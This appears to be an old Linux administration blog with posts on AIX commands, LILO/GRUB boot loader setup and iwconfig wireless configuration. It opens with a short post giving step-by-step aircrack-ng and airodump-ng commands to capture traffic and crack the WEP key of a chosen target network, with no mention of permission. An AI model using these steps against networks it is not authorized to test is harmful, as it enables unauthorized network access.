Wednesday, September 23, 2009
Thursday, August 6, 2009
WAP Security Crack
Hack Wireless WEP Network
WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. Wikipedia
It’s fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast tocrack or hack.
Install aircrack-ng - on Debian Etch by:
sudo apt-get install aircrack-ng
Then start aircrack-ng to look for wireless networks:
sudo airodump-ng eth1
Then notice the channel number of the wireless network you want to crack.
Quit aircrack-ng and start it again with med specific channel number to collect packages faster:
sudo airodump-ng -c 4 -w dump eth1
Then wait and let it collect about 500K IVS and the try the do the actual crack:
sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap
The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.
Wednesday, August 5, 2009
Aix Commands
List the licensed program products: lslpp -L
List the defined devices: lsdev -C -H
List the disk drives on the system :lsdev -Cc disk
List the memory on the system :lsdev -Cc memory (MCA)
List the memory on the system :lsattr -El sys0 -a realmem (PCI)
lsattr -El mem0List system resources
lsattr -EHl sys0
List the VPD (Vital Product Data):lscfg -v
Document the tty setup lscfg or smit screen capture F8
Document the print queues qchk -A
Document disk Physical Volumes (PVs)
lspvDocument Logical Volumes (LVs)
lslvDocument Volume Groups (long list)
lsvg -l vgnameDocument Physical Volumes (long list)
lspv -l pvname
Document File Systems lsfs fsname/etc/filesystems
Document disk allocation df
Document mounted file systems mount
Document paging space (70 - 30 rule) lsps -a
Document paging space activation /etc/swapspaces
Document users on the system /etc/passwd
lsuser -a id home ALL
Document users attributes /etc/security/user
Document users limits /etc/security/limits
Document users environments /etc/security/environ
Document login settings (login herald) /etc/security/login.cfg
Document valid group attributes /etc/grouplsgroup ALL
Document system wide profile /etc/profile
Document system wide environment /etc/environment
Document cron jobs /var/spool/cron/crontabs/*
Document skulker changes if used /usr/sbin/skulker
Document system startup file /etc/inittab
Document the hostnames /etc/hosts
Document network printing /etc/hosts.lpd
Document remote login host authority /etc/hosts.equiv
Wednesday, July 22, 2009
GRUB/LILO BOOT LOADER
LILO (current version is 21.7.5) was the first Linux boot loader, and its name simply stands for “LInux LOader.” You will never need to download it because all Linux distributions come with it.
boot=/dev/hde
map=/boot/map
install=/boot/boot.b
vga=ext
default=linux
lba32
prompt
timeout=50
password=secret
restricted
message=/boot/message-graphic
menu-scheme=wb:bw:wb:bw
image=/boot/vmlinuz
label=linux
root=/dev/hde1
initrd=/boot/initrd.img
append=" hdb=ide-scsi"
read-only
image=/boot/vmlinuz
label=failsafe
root=/dev/hde1
initrd=/boot/initrd.img
append=" hdb=ide-scsi failsafe"
read-only
other=/dev/fd0
label=floppy
unsafe
image=/boot/vmlinuz-2.2
label=linux2.2
root=/dev/hde1
initrd=/boot/initrd-2.2.img
append=" hdb=ide-scsi"
read-only
To begin the configuration, issue the following as root:
grub-install /dev/hde
where /dev/hde is the primary drive to boot from. Again, /dev/hde is the primary ATA100 drive, but if you use ATA33 or ATA66 drives, be sure to use /dev/hda.
Once grub-install runs for the first time, it will create a file called /boot/grub/device.mapand will print the contents of that file to the screen. This will list all of the drive devices on your system, including your floppy drive. After running grub-install here, my/boot/grub/device.map file looked like Table A.
| (fd0) | /dev/fd0 |
| (hd0) | /dev/hde |
| (hd1) | /dev/hdf |
| (hd2) | /dev/hdgThe device.map file |
If this looks correct, you will then need to create the GRUB configuration file:/boot/grub/menu.lst
| Example configuration file |
Monday, July 20, 2009
Wifi Configuration in redhat/suse linux
lo no wireless extensions.
wmaster0 no wireless extensions.
wlan0 IEEE 802.11abg ESSID:”xxxxxxxx”
Mode:Managed Frequency:2.437 GHz Access Point: 00:11:22:33:44:55
Bit Rate=54 Mb/s Tx-Power=15 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx [2] Security mode:open
Power Management:off
Link Quality=96/100 Signal level:-32 dBm Noise level=-69 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Step2: Alternatively, you can run the command with an interface name like the following:
Localhost:~ # iwconfig wlan0
wlan0 IEEE 802.11abg ESSID:”xxxxxxxx”
Mode:Managed Frequency:2.437 GHz Access Point: 00:11:22:33:44:55
Bit Rate=54 Mb/s Tx-Power=15 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx [2] Security mode:open
Power Management:off
Link Quality=96/100 Signal level:-32 dBm Noise level=-69 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:0
The Wireless interface can be set to one of the following different modes which impacts how the device operates:
managed – Node is a client connecting to an Access Point
master – Node acts as an Acces point
secondary – Node acts as a Secondary to a master Access point
ad-hoc – Operates in a One to One Ad-hoc connection to another Wireless device
monitor – Doesn’t connect to any Wireless network but sits and listens on all the packets on a frequency
repeater – Forwards packets between wireless nodes
The mode can be set as follows:
Step3
Localhost:~ # iwconfig
mode
For examplelocalhost :~ # iwconfig wlan0 mode managed
The above sets the interface wlan0 in managed mode.
Set ESSID for Network
Once, the mode is set, we can go ahead and set the essid of the network to which we connect
The ESSID can be set as
Step4
localhost:~ # iwconfig
essid
For instance,
localhost:~ # iwconfig wlan0 essid “ABC-WIFI”
Set Wireless Key (WEP)
We can set the WEP Encryption key (64bit or 128 bit)
Step5
localhost:~ # iwconfig
key For example,
localhost :~ # iwconfig wlan0 key 1234-5678-9101-1213
To disable WEP key
localhost :~ # iwconfig wlan0 key off
or to connect to an open network
localhost :~ # iwconfig wlan0 key open
Setting Channel which the interface uses
localhost:~ # iwconfig wlan0 channel
For example,
localhost:~ # iwconfig wlan0 channel auto
orlocalhost :~ # iwconfig wlan0 channel 11
to use channel 11.
There are other options that can be set using the iwconfig command. This can be found from the help or man page
localhost:~ # iwconfig –help
Usage: iwconfig [interface]
interface essid {NNN|any|on|off}
interface mode {managed|ad-hoc|master|…}
interface freq N.NNN[k|M|G]
interface channel N
interface bit {N[k|M|G]|auto|fixed}
interface rate {N[k|M|G]|auto|fixed}
interface enc {NNNN-NNNN|off}
interface key {NNNN-NNNN|off}
interface power {period N|timeout N|saving N|off}
interface nickname NNN
interface nwid {NN|on|off}
interface ap {N|off|auto}
interface txpower {NmW|NdBm|off|auto}
interface sens N
interface retry {limit N|lifetime N}
interface rts {N|auto|fixed|off}
interface frag {N|auto|fixed|off}
interface modulation {11g|11a|CCK|OFDMg|…}
interface commit
Check man pages for more details.
Let’s use the above for instance to quickly connect to a Wireless network as follows
localhost:~ #ig wlan0 mode managed
localhost :~ # iwconfig wlan0 essid “ABC-WIFI”
localhost:~ # iwconfig wlan0 key 1111-2222-3333-4444
localhost:~ # iwconfig wlan0 channel auto
The above sets the wlan0 interface to managed mode so it can connect to a Wireless Access point. We then configure an ESSID of a network and then a related key and an auto channel selection.
NOTE: using WEP security is not secure and can be cracked in in minutes. We’ll cover soon the use of WPA/WPA2 for stronger protection from hackers